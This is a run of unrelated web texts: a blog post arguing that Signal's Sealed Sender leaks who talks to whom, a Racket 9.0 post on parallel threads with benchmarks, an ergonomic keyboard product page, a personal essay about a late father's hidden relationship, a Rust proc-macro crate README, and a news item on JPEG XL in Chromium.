I said that because Signal uses our phone numbers as ID’s. So, Signal would know that Phone Number A is talking to Phone Number B, and if they can figure out that Phone Number A belongs to me, and Phone Number B belongs to my buddy (usually not too hard to figure out with some OSINT or the assistance of certain governments), then Signal would know that my buddy and I are talking, even if they don’t know what we’re talking about.
This is a limit of end-to-end encryption, which I’ve talked about before. End-to-end encryption provides confidentiality of data, but not anonymity or protection from identifying metadata.
However, I was surprised when my friend got back to me saying that, no, Signal actually doesn’t know who’s talking to who because of this feature called “Sealed Sender”. “Woah! Seriously?! Cool!” I thought. But then I started reading how Sealed Sender actually works, according to none other than Signal themselves, and I found that this feature is very technically complex, and totally useless.
ʕ ಠ ᴥಠ ʔ: Woah! Seriously?! Not cool!
One-way anonymity for two-way communications
While Sealed Sender is pretty complicated under the hood, the result of it is one-way anonymity. That means that, when Phone Number A sends a message to Phone Number B, Signal won’t know that the message is coming from Phone Number A and will only know that the message is to be delivered to Phone Number B.
It does this in a way that’s very similar to snail mail without a return address: the letter inside the mail envelope might tell the recipient who the sender is, but the mail envelope itself tells the post office only who the recipient is so that it can be delivered to them. If the post office doesn’t or can’t open the envelope to read the letter itself, then they don’t know who the sender is. Later on, when the recipient wants to send a reply to the sender, they can do the same thing.
ʕ·ᴥ·ʔ: Hm, okay. This kind of sounds like it’s anonymous.
Well, yes, it sort of is, but only when there’s only one message to be sent. The problem comes up when multiple messages are being sent back-and-forth like this.
Sticking with the snail mail analogy, what happens when two pen pals keep sending mail to each other from their homes without including return addresses in their envelopes? The postal service might not know who exactly is sending each piece of mail but, over time, they would know that Address A in Lower Manhattan, New York, keeps on getting one-way mail from the post office at 3630 East Tremont Avenue, the Bronx, New York; and Address B in the Bronx keeps on getting one-way mail from the post office at 350 Canal Street, Lower Manhattan.
ʕ´•ᴥ•`ʔ: Oh. Then the postal service would be pretty sure that whoever is living at Address A and Address B are talking to each other.
Exactly. That’s the limitation of one-way anonymity: it works only one way! Once you start doing two-way communications, with replies going back-and-forth, then one-way anonymity is useless.
Two pieces of metadata
With multiple messages being sent back-and-forth over time, and with Signal knowing only the recipient phone number of each message, it would be pretty hard for Signal to figure out who’s talking to who when their servers are getting thousands of messages every second from different senders, with each message being conveyed to thousands of different recipients. But Signal doesn’t know only the recipient phone number of each message; they also know the IP address of each sender. And this is where the snail mail analogy fails, because IP addresses are much more specific than post offices.
Signal messages, as we all know, get sent over the internet, and the internet sends data around using IP addresses. Sealed Sender only protects the sender’s phone number; it does not protect the sender’s IP address. So, if you’re sending Signal messages to your super secret pen pal from your house, and you aren’t using a VPN or Tor, then Signal knows that the messages being sent to your pen pal’s phone number are coming from your house’s IP address (not a post office, your house).
Even if you are using some method of masking your real IP address, you still have to use some IP address in order to communicate on the internet, and Signal will see that the same IP address keeps on sending messages to the same phone number. That’s enough to easily figure out that all of these different messages meant for the recipient are coming from the same sender. Sure, maybe you’re using the IP address of a VPN server or Tor exit node that has other Signal users sending messages at the same time, but that’s extremely unlikely. More likely: even when you use a VPN or Tor, Signal can easily tell that every Sealed Sender message you’re sending to your pen pal is coming from one person: you.
And if your pen pal replies, the reply will have his IP address on it (the same IP address Signal sent your messages to) and your phone number on it. And then, when you want to receive the reply, you have to connect to Signal’s servers using, again, your IP address (the same IP address you used to send your messages to your pen pal earlier). Just like that, with two messages, Signal has figured out which phone number (yours) is talking to which other phone number (your pen pal’s). If they ever decide to try and figure out who owns these two phone numbers, they could ask your telecoms, or simply search Facebook and Twitter.
You can’t avoid using IP addresses on the internet; they are a necessity on the internet. But you can use a VPN or Tor to mask your real IP address with a fake one that’s not tied to your identity.
But you can’t do that with phone numbers.
A phone number is either tied to your identity or it isn’t; there is no masking possible, unless you use a service like MySudo, which isn’t available for most of us (US and Canada only, as of this writing). If you’re fortunate enough to be able to buy a prepaid SIM without ID, then great, all you and your pen pal have to do is buy some SIM cards that aren’t tied to your identities. If buying a prepaid SIM without ID ain’t an option, then your phone number has to be tied to your identity, and Signal can use these unmasked phone numbers, in combination with masked or unmasked IP addresses, to figure out who’s talking to who, despite Sealed Sender’s promises, as long as there’s a two-way conversation going on.
Which brings up an interesting question:
Why does Signal require phone numbers?
ʕ´•ᴥ•`ʔ: Hey, that is an interesting question…
Signal works over the internet, and the internet requires IP (internet protocol) addresses in order to figure out where a message should go. But sending messages over the internet does not require phone numbers; that’s a requirement when using SMS or cellular calls or mobile data, but not for using the internet. And yet, the “privacy-protecting” Signal app requires you to use a phone number to send and receive messages…
ʕ⚆ᴥ⚆ʔ: Hmmmm…
It’s always a two-way street
It gets worse. I keep repeating this: two-way communication. Sealed Sender doesn’t work with two-way communication. But I’ve kind of been lying. The truth is: Signal already knows which phone numbers have been talking to which, even with Sealed Sender and only one-way communication.
ʕ ಠ ᴥಠ ʔ: What?!
Do these check marks look familiar to you? (Forgive the pixelation.)
ʕ·ᴥ·ʔ: Hm, yeah. Aren’t they the check marks that show up for at least a second whenever I send a Signal message? This is what’s shown after the lone check mark, and before they both turn white to indicate that my message was read, right?
That’s right. The lone check mark indicates that your Signal message was sent to Signal’s servers; the two check marks above indicate that your Signal message has been delivered to the recipient; and the two white check marks indicate that the recipient has read your Signal message.
Now, the thing about the two check marks above is that your Signal app only shows them when your phone has received what’s called a “delivery receipt” from the recipient’s phone. Whenever your pen pal gets a message from you, their Signal app sends a delivery receipt from their phone, through Signal’s servers, to your phone. Their Signal app does this automatically and instantly, and neither of you can turn it off. You can turn off read receipts (the two white check marks) and typing indicators, but you can’t turn off the very first reply: delivery receipts.
The delivery receipt is – ahem – also “protected” using Sealed Sender, but what was it that I’ve been saying this whole time is wrong with Sealed Sender?
ʕ·ᴥ·ʔ: It works only one-way…
ʕ • ᴥ • ʔ: It works only one-way…
ʕ º ᴥ º ʔ: …and the delivery receipt automatically makes it two-way.
Exactly. And you can’t turn it off. Go figure why.
Some alternatives and a work in progress
So if you can’t trust Signal, who can you trust? Well, if all you need is a private text-based communication channel that won’t falsely advertise its privacy guarantees to you, Proton Mail and Tutanota (now called Tuta) are pretty good. But if you want private voice-based communication, then that’s gonna’ be a problem. WhatsApp is even worse than Signal, Telegram is even worse than WhatsApp, Wire requires an email address to use it (another unnecessary requirement), and most of the rest can’t be trusted because they aren’t open-source.
You could use Jitsi for voice communications, but you’d have to use a separate service for text communications. You could use Matrix for both text and voice, but that’s a piece of software and a communication protocol, so you’d have to set up your own server running it. You could use Element, which runs Matrix servers, but you’d have to trust Amazon and Cloudflare with your metadata, making this a rather messy solution to a privacy problem.
What that leaves us with is a single service that is still a work in progress: SimpleX. It asks for no global identifiers like phone numbers or email addresses. It at least tries, unlike Signal, to make sure that it doesn’t know who’s talking to who. It does this with the use of proxies that you randomly send your messages through to get to your recipient (the technical details of which are too complicated to get into here). Of course it is open-source and end-to-end encrypted, otherwise I wouldn’t be mentioning it. It even goes so far as to allow you to use Tor with it, or any SOCKS proxy. It’s pretty cool, actually; the most technically amazing communications platform I’ve ever seen.
But, it ain’t perfect. It’s kinda’ slow, and messages sometimes don’t come in in the right order or don’t come in at all. Voice calls are… iffy, particularly when using Tor. It is still a young, developing project, though it has been making great strides in improving itself, including getting a security audit.
Time will tell how it turns out, but at least I can say one thing: we’ve got a viable alternative.
Hey, Kuma!
ʕ •̀ᴥ•́ ʔ: Where have you been for the past 11 months?!
I actually started writing this article months ago and then got busy again.
ʕ ಠ ᴥಠ ʔ: Well at least visit me with some tips and tricks every once in a while.
I’ll try, buddy, but real life comes first before imaginary friends.
ʕ •̀ᴥ•́ ʔ: I know I’m imaginary, but are your subscribers?
I dunno’. Maybe they should give me a hint by signing up below!
Or don’t; my RSS feed’s in the site menu. Unlike Signal, I don’t need you to sign up with a global identifier.
posted by Matthew Flatt, Ryan Culpepper, Robby Findler, Gustavo Massaccesi, and Sam Tobin-Hochstadt
With the version 9.0 release, Racket includes support for shared-memory threads that can take advantage of multicore hardware and operating-system threads to run in parallel—not merely concurrently with other Racket threads, as was the case in versions before 9.0. Creating a thread that runs in parallel is as simple as adding a flag to the call to thread.
To see the effect, try first putting the following code into a file named "thread.rkt" and running racket thread.rkt on the command line:
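A minimal sketch of the kind of program described (the helper name find-square-roots and the value of N are assumptions, not the post's actual snippet):

    #lang racket

    ;; Each thread computes N square roots; tweak N to match your machine.
    (define N 50000000)

    (define (find-square-roots)
      (for ([i (in-range N)])
        (sqrt (+ 1.0 i))))

    ;; Two coroutine threads: concurrent, but not parallel.
    (define workers
      (for/list ([_ (in-range 2)])
        (thread find-square-roots)))

    (for-each thread-wait workers)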
Racket will find many square roots (tweak N to match your machine), but will keep only one core of your CPU busy. Using time in the shell reports “CPU” (possibly broken into “user” and “system”) and “real” times that are similar. To use two cores, add #:pool 'own to the thread call:
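A corresponding sketch of the parallel version, assuming the same find-square-roots helper and changing only the thread creation:

    ;; Two parallel threads, each in its own parallel thread pool.
    (define workers
      (for/list ([_ (in-range 2)])
        (thread find-square-roots #:pool 'own)))

    (for-each thread-wait workers)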
In this case, real time should be about half of CPU time, while CPU should remain similar to before. In other words, the parallel version runs twice as fast. On the machine used below:
                speedup   real        CPU         CPU for GC
    concurrent  ×1        1011 msec    979 msec   10 msec
    parallel    ×2         517 msec   1021 msec   13 msec
Passing the new #:pool argument creates a parallel thread; create pools via make-parallel-thread-pool to have a group of threads share processor resources, or just pass 'own to have the new thread exist in its own parallel thread pool.
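For example, a sketch of a shared pool; the processor-count argument to make-parallel-thread-pool and the find-square-roots helper are assumptions here, not taken from the post:

    ;; Two parallel threads sharing one pool limited to two processors.
    (define pool (make-parallel-thread-pool 2))

    (define workers
      (for/list ([_ (in-range 2)])
        (thread find-square-roots #:pool pool)))

    (for-each thread-wait workers)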
As a further addition to thread, a #:keep 'result argument keeps the result of the thunk when it returns, instead of discarding the result. Retrieve a thread’s result with thread-wait. So, for example, a call of the following shape runs its thunk in parallel to other Racket threads, blocks the current Racket thread (while allowing other Racket threads to continue, even non-parallel ones), and then returns the result value(s) when the thunk completes.
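A sketch of such a call; the particular thunk is just an assumed example:

    ;; Run a thunk in its own parallel pool, keep its result, and block on it.
    (define (thunk)
      (for/sum ([i (in-range 10000000)])
        (sqrt (+ 1.0 i))))

    (thread-wait
     (thread thunk #:pool 'own #:keep 'result))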
To maintain backwards compatibility, the thread function still creates a coroutine thread by default, which is a lightweight thread that is preemptively scheduled and whose execution is interleaved with other coroutine threads. For many tasks that need the organizational benefits of concurrency without the performance benefits of parallelism, such as when managing GUI interactions or orchestrating remote processes, coroutine threads are still the best abstraction. Coroutine threads can use #:keep 'result, too.
Racket’s full thread API works with parallel threads. Follow the links from the thread documentation to see more details on thread pools and for more interesting uses. Of course, just because you put tasks in parallel threads doesn’t mean that they always speed up, as sharing and communication can limit parallelism. Racket’s future visualizer works for parallel threads, though, and it can help you understand where synchronization in a task limits parallelism.
Also, adding parallelism to Racket potentially creates trouble for existing
libraries that were not designed to accommodate parallelism. We expect
problems to be rare, however.
We’ll explore the performance details and explain why we expect most
programs will continue to work well later in this post, but first:
Racket’s Road to Parallelism
Running threads in parallel counts as news in 2025?! Well, it has been a long
road.
Racket’s implementation started in the mid-1990s, just as a wave of
enthusiasm for parallel programming was winding down. Although
operating systems by that point consistently supported within-process
threads, computers with multiprocessors were not commonly available.
Many language runtime systems from the same era—including Python, Ruby, and OCaml—took advantage of the internal simplicity of a single-threaded runtime system while offering constructs for concurrency at the language level. Racket has always included threads for concurrency, and it was an early adopter of Concurrent ML’s abstractions for managing concurrency well. But an absence of parallelism was deeply baked into the original implementation.
Over time, to provide support for parallelism, we added places and futures to Racket. Places support
coarse-grained parallelism through a message-passing API, effectively
running parallel instances of the virtual machine within a single
operating-system process; limited sharing makes the implementation
easier and safer than arbitrary sharing between parallel threads.
Futures provide fine-grained parallelism for restricted computations;
a future blocks when it tries to perform any operation that would be
difficult for the runtime system to complete safely in parallel.
Places and futures are both useful, and they avoid some pitfalls of
shared-memory threads. Still, fitting a parallel task into futures or
places usually requires special effort.
Meanwhile, single-threaded execution was only one of the problems with
the original Racket (a.k.a. PLT Scheme) implementation. To address
larger problems with the implementation and to improve performance, we
started in 2017 rebuilding Racket on top of Chez Scheme. Rebuilding took some time, and we only gradually deprecated the old “BC” implementation in favor of the new “CS” implementation, but the transition is now complete. Racket BC is still maintained, but as of August 2025, we distribute only Racket CS builds at https://download.racket-lang.org.
Chez Scheme is a much better foundation for improving parallelism in
Racket. Part of the Racket-rebuilding effort included improving Chez
Scheme’s support for parallelism: we added memory fences as needed for
platforms with a weak memory-consistency model, and we parallelized
the Chez Scheme garbage collector so that garbage collection itself
runs in parallel. There’s still plenty of room for improvement—
the
garbage collector is only parallel with itself, not the main program,
for example—
but further improvements are more within reach than
before. Equally important, the rebuild included new implementations of
the Racket thread scheduler and I/O layer in Racket itself (instead of
C). Because of these improvements, Racket’s futures worked better for
parallelism from the start in Racket CS than in Racket BC.
With version 9.0, we finally take advantage of new opportunities for
parallelism created by the move to Racket CS. Internally, a parallel
thread is backed by a combination of a future and a coroutine thread.
The main extra work was making Racket’s coroutine thread scheduler
cooperate more with the future scheduler and making the I/O layer safe
for Chez Scheme threads—
all while making locks fine-grained enough
to enable parallelism, and keeping the cost of needed synchronization
as low as possible, including for non-parallel Racket programs.
Performance
Here are some simple benchmarks on an M2 Mac to give a sense
of the state of the current implementation. This machine has 8
cores, but 4 big and 4 little, so ×4 speedup is possible with
4-way parallelism but less than ×8 with 8-way parallelism.
As an easy first example, we should expect that a Fibonacci [
code
] run of
1 iteration in each of 4 coroutine threads takes the same time as
running 4 iterations in 1 thread, while 1 iteration in each of 4
parallel threads should take about 1/4th of the time. Also, for such a
simple function, using plain old futures should work just as well as
parallel threads. That’s what we see in the numbers below.
Times are shown as a speedup over single-threaded, followed by the
real elapsed milliseconds. The times are from a single run of the
benchmark.
(fib 40), real msec

N   sequential      coroutine       parallel        futures
1   ×1       511    ×1       506    ×1       494    ×1       495
4   ×1      2045    ×1      2034    ×3.7     554    ×3.8     545
8   ×1      4154    ×1      4154    ×5.4     776    ×5.2     796
Of course, most programs are not just simple arithmetic. If we
change our example to repeatedly convert numbers back and forth
to strings as we compute Fibonacci [
code
], then
we can see the effects of the more complex conversions. This version
also triggers frequent allocation, which lets us see
how thread-local allocation and parallel garbage collection scale.
(strfib* 32), real msec

N   sequential      coroutine       parallel        futures
1   ×1       204    ×1       205    ×1.1     192    ×1       211
4   ×1       826    ×1       808    ×3.7     222    ×3.7     221
8   ×1      1619    ×1      1602    ×3.9     419    ×4       406
From this table, we still see reasonable scaling up to four cores,
but the additional work and the use of the garbage collector limit
scaling beyond that point.
That first string variant of Fibonacci includes a slight cheat,
however: it goes out of its way to use a
string->number*
wrapper that carefully calls
string->number
in a way that
avoids evaluating expressions that compute the default values of some
arguments. The defaults consult the
parameters
read-decimal-as-inexact
and
read-single-flonum
—
which is a perfectly fine thing to do in
general, but it turns out to block a future, because parameter values
can depend on the current continuation. In contrast, parallel threads
continue to provide a benefit when those kinds of Racket constructs
are used. We can see the difference by using plain
string->number
in place of
string->number*
, which
will fetch parameter values 14 million times in each individual run of
(strfib 32):

(strfib 32), real msec

N   sequential      coroutine       parallel        futures
1   ×1       772    ×1.3     578    ×1.1     721    ×0.9     873
4   ×1      3169    ×1.3    2364    ×4       797    ×0.8    4164
8   ×1      6409    ×1.4    4730    ×4.3    1493    ×0.8    8353
The coroutine column here also shows an improvement, surprisingly.
That’s because a coroutine thread has a smaller continuation than the one in
the sequential column, and the cost of fetching a parameter
value can depend (to a limited degree) on continuation size.
The effect of parallel threads on this kind of program is
more consistent than fine details of a continuation’s shape.
Operations on mutable
equal?
-based
hash tables
[
code
] are another case where
futures block, but parallel threads can provide performance
improvement.
(hash-nums 6), real msec

N   sequential      coroutine       parallel        futures
1   ×1       193    ×1       190    ×1       186    ×1       191
4   ×1       767    ×1       763    ×3.7     208    ×1       763
8   ×1      1541    ×1      1532    ×4.5     346    ×1      1539
As an illustration of the current limitations of parallel threads in
Racket, let’s try a program that writes data to a byte-string
port
then hashes it
[
code
].
(hash-digs 7), real msec

N   sequential      coroutine       parallel        futures
1   ×1       127    ×1       127    ×0.9     135    ×1       126
4   ×1       503    ×0.9     536    ×2.5     201    ×1       520
8   ×1      1022    ×0.9    1097    ×2.5     403    ×1      1049
Here we see that parallel threads do get some speedup, but
they do not scale especially well. The fact that separate
ports are not contended enables performance
improvement from parallelism, but speedup is limited by some
general locks in the I/O layer.
Even further in that direction, let’s try a program that
hashes all files in the current directory [
code
] and
computes a combined hash. When run on the
"src"
directory of
the Racket Git repository, most of the time is reading bytes from
files, and locks related to file I/O are currently too coarse-grained
to permit much speed-up.
(hash-dir), real msec

N   sequential      coroutine       parallel        futures
1   ×1       170    ×1       169    ×0.7     256    ×1       170
4   ×1       692    ×1       662    ×1.3     515    ×1       681
8   ×1      1393    ×1.1    1293    ×1.6     868    ×1      1368
Having locks in place for parallel threads can impose a cost on
sequential programs, since locks generally have to be taken whether or
not any parallel threads are active. Different data structures in
Racket use specialized locks to minimize the cost, and most benchmarks
reported here report the same numbers in the sequential column for Racket v8.18 (the
previous release) and Racket v9.0. The exceptions are the
(hash-nums 6) and (hash-digs 7) benchmarks, because
those measure very fine-grained actions on mutable hash tables and I/O
ports, and the cost is largest there. Comparing sequential times
for those two versions shows that support for parallel threads can cost
up to 6-8% for programs that do not use them, although the cost tends
to be much less for most programs.
(hash-nums 6), real msec

N   v8.18 sequential    v9.0 sequential
1   ×1        188       ×0.96      195
4   ×1        757       ×0.98      773
8   ×1       1520       ×0.98     1546
(hash-digs 7), real msec

N   v8.18 sequential    v9.0 sequential
1   ×1        118       ×0.94      126
4   ×1        474       ×0.94      506
8   ×1        947       ×0.92     1025
Overall, parallelizable numerical programs or ones that manipulate
unshared data structures can achieve speedup through parallel threads
relatively easily, but I/O remains a direction for improvement.
Backward Compatibility
If a library uses mutable variables or objects, either publicly or
internally, then it must use locks or some other form of concurrency
control to work properly in a multithreaded context. Racket already
has concurrency, and the expectation for libraries to work with
threads does not change with the introduction of parallel threads.
Racket’s semaphores, channels, and other synchronization constructs
work the same with parallel threads as concurrent threads. Even
programs that use lock-free approaches based on compare-and-swap
operation (such as
box-cas!
) continue to work, since Racket’s
compare-and-swap operations use processor-level primitives.
Still, there are a few concerns:
Racket’s coroutine threads offer the guarantee of
sequential consistency
, which means that effects in one
thread cannot be seen out-of-order in another thread. Parallel threads
in Racket
expose
the underlying machine’s memory-consistency model
, which may allow
reordering of memory effects as observed by other threads. In general,
a weak memory model can be an issue for code not intended for use with
threads, but Racket—
more precisely, Chez Scheme—
always guarantees
the memory safety of such code using memory fences. That is, Racket
code might observe out-of-order writes, but it never observes
ill-formed Racket objects. The fences are not new, and they are part of
the same write barrier that already supports generational garbage
collection and the memory safety of futures. Sequential consistency
does permit lock implementations that would not work with weaker
memory models (they would work with coroutine threads but not with
parallel threads), but we have not found any such implementations in
Racket libraries.
Some Racket libraries use
atomic mode
for concurrency
control. Atomic mode in Racket prevents coroutine thread swaps, and
entering atomic mode is a relatively cheap operation within Racket’s
coroutine scheduler. When a parallel thread enters atomic mode, then
it prevents other coroutine threads from running, but it does
not
prevent other parallel threads from running. As long as
atomic mode is used consistently to guard a shared resource, then it
continues to serve that role with parallel threads.
Entering atomic mode is a much more expensive operation in a parallel
thread than in a coroutine thread; in many cases, Racket core
libraries that need finer-grained locking will specifically need to
move away from using atomic mode. Still, making atomic mode
synchronize a parallel thread with coroutine threads provides a
graceful fallback and evolution path.
Foreign functions that are called by Racket in a coroutine
thread are effectively atomic operations when there are no parallel
threads, since a coroutine swap cannot take place during the foreign
call. It’s rare that this atomicity implies any kind of lock at the
Racket level, however, and the foreign function itself is either
adapted to operating-system threads or not. Racket can already create
operating-system threads through
dynamic-place
, and
foreign-function bindings have generally been adapted already to that
possibility.
The greater degree of concurrency enabled by parallelism exposed some
bugs in our existing core libraries that could have been triggered
with coroutine threads, but hadn’t been triggered reliably enough to
detect and repair the bugs before. Beyond those general improvements,
our experience with pre-release Racket is that parallel threads have
not created backward-compatibility problems.
Banish pain with the most adaptable ergonomic keyboard and mousing instrument ever made.
Magnetic = Light + Tactile
Lightly
brings fifty perfectly light, perfectly tactile magneto-optical keys to your fingertips, with integrated pointing for completely hands-down operation.
"Over the past six months, the Svalboard has transformed the way I work, helping alleviate my neck and shoulder issues by allowing me to type without strain. Svalboard isn’t just another keyboard—it’s a game-changer for comfort and productivity."
Built with a ~15° tent angle and M5 tenting screw inserts for extra tenting. It also has 1/4"-20 inserts for additional mounting options: chair-mount, lap desk, keyboard tray and Magic Arm compatible. Pictured here with
SmallRig Rosette 11" Magic Arms
Multiple Pointing Options
Trackball, Trackpoint, and now: Touchpad!
Mix-and-match these integrated pointing devices for maximum comfort.
QWERTY
touch typers start with their fingers on the home-row:
A,S,D,F
for the left hand and
J,K,L,;
for the right hand. On Svalboard these are exactly the same. Your fingers rest on the round center keys of each key cluster. Then the
G
and
H
are simply inward flicks of the index fingers. The remaining four letters:
T, Y, B
and
N
are assigned new positions, becoming inward flicks of the middle and ring fingers. The thumb keys switch between different layers: (1)
Letters
, (2)
Numbers
, (3)
Functions
and (4)
Navigation
.
Alternative layouts like
Dvorak
or
Colemak
are easy to set up because the Svalboard Lightly is infinitely customizable. It uses
Vial-QMK
to change keys in real-time with no flashing required.
No more springs or lubed switches. Svalboard's keys are light 20gf magneto-optical keys that have a 100% front-loaded force profile and a clean breakaway unlike anything else on the market. Fingers move just a few mm for any keypress. This reduces hand workload and fatigue by ~90% vs traditional keyboards, even "ergonomic" ones.
No more contortions or reaches to hit the keys at the edge of your keyboard.
"As a Datahand user of 20+ years, I can safely say that Datahand saved my career. I've tried everything over the years, and there's simply no comparison. When the company died, I was gutted. When one of my precious Datahand units got damaged during travel, I got serious about building a replacement.
It was around then I found out about Ben Gruver's amazing
lalboard
design and built one myself, with lots of help from him.
Lalboard laid the foundation of basic key mechanisms which enabled Svalboard to come to life, but... it was not a production-oriented design. With my background in high volume consumer electronics and input tech development, I decided it was time for me to dive in and make it a reality.
Like Datahand, I hope Svalboard will help thousands of RSI sufferers like me enjoy a faster, safer, more precise, and most of all PAIN FREE typing experience."
Built for the long now
In the spirit of the Svalbard Global Seed Vault, we're committed to a living design which can always be repaired, updated and modified by customers.
All mechanical parts can be produced on a hobby-grade 3D printer, from SLA, or CNC'd from any material you like.
All pinouts are available if you want to hack your own electrical modifications, too.
In the proud tradition of the Datahand, we've designed Svalboard to be robust, easy-to-clean, and repairable.
Unlike Datahand, Svalboard is totally modular, for easy repairs and modifications.
There are no electromechanical contacts to wear out.
Keys are easily removable for cleaning.
Did we mention you can make your own replacement/custom-fit parts on a hobby-grade 3D printer?
Proudly made in the USA
,
with a global following
People in over two dozen countries are enjoying pain-free typing with Svalboard Lightly today. Join them on the Discord and learn how Lightly changed their lives:
a few days after
dad died
, we found the love letters, hidden away among his things. one of them said,
i love dota and i love peaches, but i love you more. i will quit smoking and lose weight for you. the happiest days of my life are the ones that start with you across the breakfast table from me.
my parents were not a love match. at 27 and 26, they were embarrassingly old by the standards of their small chinese port town. all four of my grandparents exerted enormous pressure to force them together.
my father fulfilled the familial obligations heaped on his shoulders without complaint. he didn't get along with my mother, or my younger brother, but this wasn't too bad; he often worked away from us (for months and even years on end), mostly in china, more recently in redacted, another canadian city.
the physical distance between us for most of my life has made his passing easier for me to come to terms with. i call him dad here but i didn't lose a dad, i lost someone who was abstractly a father to me. he was more often gone than there, had missed all of my graduations and birthday parties. there was one time he took care of me when i was sick. his hands on me were gentle, and he told me stories from chinese history while i lay feverish in bed. i was seven. this is approximately the only memory i have of him being a dad to me.
still, the two of us were close in our own way. sometimes, the two of us would go on long walks together. after fifteen minutes of silence, or twenty, something would loosen in him and he would start to tell me about the depths of his sadness and the disappointment in the way his life played out. i was good at not taking this personally. i didn't think he ever had a chance to be happy or authentic, his entire life. he sacrificed himself so i could.
i always thought that if he had a chance at happiness, he would be the gentle, funny, and sensitive aesthete that i caught glimpses of sometimes, instead of the bullheaded chinese patriarch others seemed to demand.
except it turns out he did have this chance after all. his lover and i ended up meeting soon after his death. edward lived in redacted, the city that my dad had worked in for the past year and a bit.
edward tells me their story, all in a rush. he and my dad had been seeing each other for three years, and had agreed to go exclusive a year and a half ago. they met while he was in china, and there was an instant spark between them, something special and precious that neither of them had felt before. dad convinced him to apply for a university program here in canada, to eventually get permanent residency in canada. so edward, in his 30s, sold his flourishing business and his house, and came to start over in a foreign land for the sake of being with him.
edward reckons they were engaged, or something like it; they lived together, toured open houses in redacted every weekend with every intent to buy something together, and there was an understanding that dad would soon come out, divorce my mother, and live in the open with edward for the rest of their lives.
edward gave me some photos he had of my dad, and i could scarcely believe that they were of the grim, sad man i knew. he beams in all of them, glowing with joy, his smile more incandescent than i've ever seen in my entire life. i steal glances at edward, the person who took all those impossible photos. the person he was looking at.
my mind keeps stuttering to boskovitch's installation, that single box fan behind plexiglass. i imagine the course of events from edward's point of view: a year living with the love of your life, and then they are suddenly gone in an awful accident and you are too late to see them one last time, to attend the funeral. your own grief is an isolating thing because you are closeted and no one else knew who you were to each other. i wish we had gotten in touch sooner, but edward is grateful to be allowed any affordance, at all.
their life in redacted seemed similarly impossible: a life where my dad splurged on the treats he never did at home (hagen dazs ice cream, honeycrisp apples, nice shoes) and left the house on a regular basis to explore the city with the one he loves. a life where he felt safe enough to ask for kisses and cuddles because he knew they would be provided, even to
sa jiao
playfully. all i ever knew him to do at home was to sit in a stupor by the television set.
and there was a new hurt, but it was sweet, to imagine the way life could have been in ten years time, a life i've never previously imagined; dad happily with edward in a nice new house where i'd visit every so often, shoulders loose and smiling, and we'd get to talk,
actually
talk.
according to edward, my dad had known that he had liked men at least since his university years. that makes it almost forty years in the closet, then; just thinking about it makes me feel a sort of dizzying claustrophobia.
i came out to mom years before i came out to dad. when i did, mom told me that coming out to dad was not a good idea, because he was such a traditionalist and she didn't know how he would react. but i came out to him anyways, one quiet afternoon when i visited him in china, because i thought our relationship was good and that he can handle it, and i wanted him to know this about me.
when i did, he took it well. he told me that though the path i am on is a painful one, he would be there for me, and that the most important thing was to find
xin fu
in life, not to live your life in accordance to the expectations of anyone else. in my staggering relief i did not notice the confusion. i just felt so grateful to have had that understanding, a precious gift that i did not have any expectation of receiving. now, i feel only bereft of the conversations we never managed to have, and grief for the life he never got to live.
dad lives in my living room these days, in a box made of cherry wood, because mom didn't want him in the house after the truth came out. so when edward visited, he got to see him one last time, and say goodbye. he held the box in his arms and wept, spilling more tears and emotions than his biological family managed to, and i escaped to my room for the evening to give them some privacy.
did i mention the shrines? we set them up for the dead in our culture. we had ours, a formal thing in a cabinet, and we had knelt in front of it like we were supposed to, given the correct number of kowtows. edward shared with me pictures of his. it sprawled over the entirety of his dining table. it had packs of playing cards from the brand he liked best and his favourite cuts of meat and the wine he finished off the day with. every morning, he would play my dad's favourite songs to him. i didn't know my dad's favourite cuts of meat. i didn't know he drank wine. i didn't know he listened to music.
so of course i let them say goodbye to each other. when i went out of my room the next morning, he was still fully dressed on my couch, bedding untouched, staring blankly at the box in his lap. it gleamed red in the morning sun. he rose at my approach, put my dad back on the mantle with gentle hands, and then stood quietly at a perfect parade rest in front of him as i managed breakfast for the two of us. his flight back to redacted was that afternoon.
i don't know how to thank you for all this, he says. the chance to say goodbye. he was really proud of you, he spoke about you to me all the time. he never told me that you were gay. edward tells me that dad had plans to go back to redacted in a few weeks time and that he wanted to tell me everything before he left, but he was anxious about how i'd take it. i don't ask edward how many times he'd made the resolution to tell me before.
because you see, my dad was a coward. mom had started asking for divorces by the time i was in my teens, and dad was the one who always said no. he would complain to
her
mother, a traditionalist, to ensure that she would berate her daughter back into line. his family and his culture had no place for him, so he used her as a shield to make sure that he would be spared the scrutiny. slowly, we found evidence of other affairs, going back decades. of course my mother did not want him in the house.
i sit by my dad sometimes, and i make sure he always has a bowl of fresh fruit. fifty seven years, most of them suffocating and miserable, the last three of them shot through with so much joy his smile absolutely glows.
he wasted his entire life
, my mom said to me, the evening we found the love letters.
his entire life, and mine as well.
This crate implements a small parser for token streams holding S-Expressions.
The S-Expression syntax is very minimal and not conforming to any standard.
The only dependency is
proc-macro2
,
so it should compile very fast.
Why ?
The goal of this library is to make it as convenient as possible to write
a whole range of proc macros. Writing a proc macro usually takes a
lot of effort.
Most of that effort goes into parsing the input, typically using
syn
, which is incredibly powerful, but
very tedious, and slow to compile. If you don't need to bother yourself with
parsing, and have an easy time accessing the results of said parsing, most
of the trouble of writing proc-macros is gone already.
Additionally, QSP is very simple and only has a single dependency, which
should make it compile pretty fast.
Sadly, you will still have to create a macro-crate for your proc-macro.
To reach true lisp-macro-convenience, we still require
in-package proc-macros
Examples
You can run this by running
cargo run --example pipe
. It implements
a simple pipe macro. If you were to put this into a macro-crate and name
it
pipe
, an invocation in actual code would look just like the
input_string
except
with
pipe!
before the opening parenthesis. And you would need to turn the result
string into a
TokenStream
again, of course.
The following functions are defined on the
Expr
type, which make it
very easy to use. The error messages contain as much information as possible,
and should make it easy to catch mistakes, even if you just liberally use
?
everywhere.
try_flat_map<F, T, E, R>(&self, f: F) -> Result<Vec<T>, TryFlatMapError<E>>
BorrowedList
reimplements all list-related functions.
State
This is still a proof of concept. I intend to use it the next time I need
a proc-macro, but that hasn't happened yet. It currently serves as an example
of an idea.
Google Revisits JPEG XL in Chromium After Earlier Removal
Three years ago, Google removed JPEG XL support from Chrome, stating there wasn’t enough interest at the time. That position has now changed.
In a recent note to developers, a Chrome team representative
confirmed
that work has restarted to bring JPEG XL to Chromium and said Google “would ship it in Chrome” once long-term maintenance and the usual launch requirements are met.
The team explained that other platforms moved ahead. Safari supports JPEG XL, and Windows 11 users can add native support through an image extension from the Microsoft Store. The format is also confirmed for use in PDF documents. There has been continuous demand from developers and users who ask for its return.
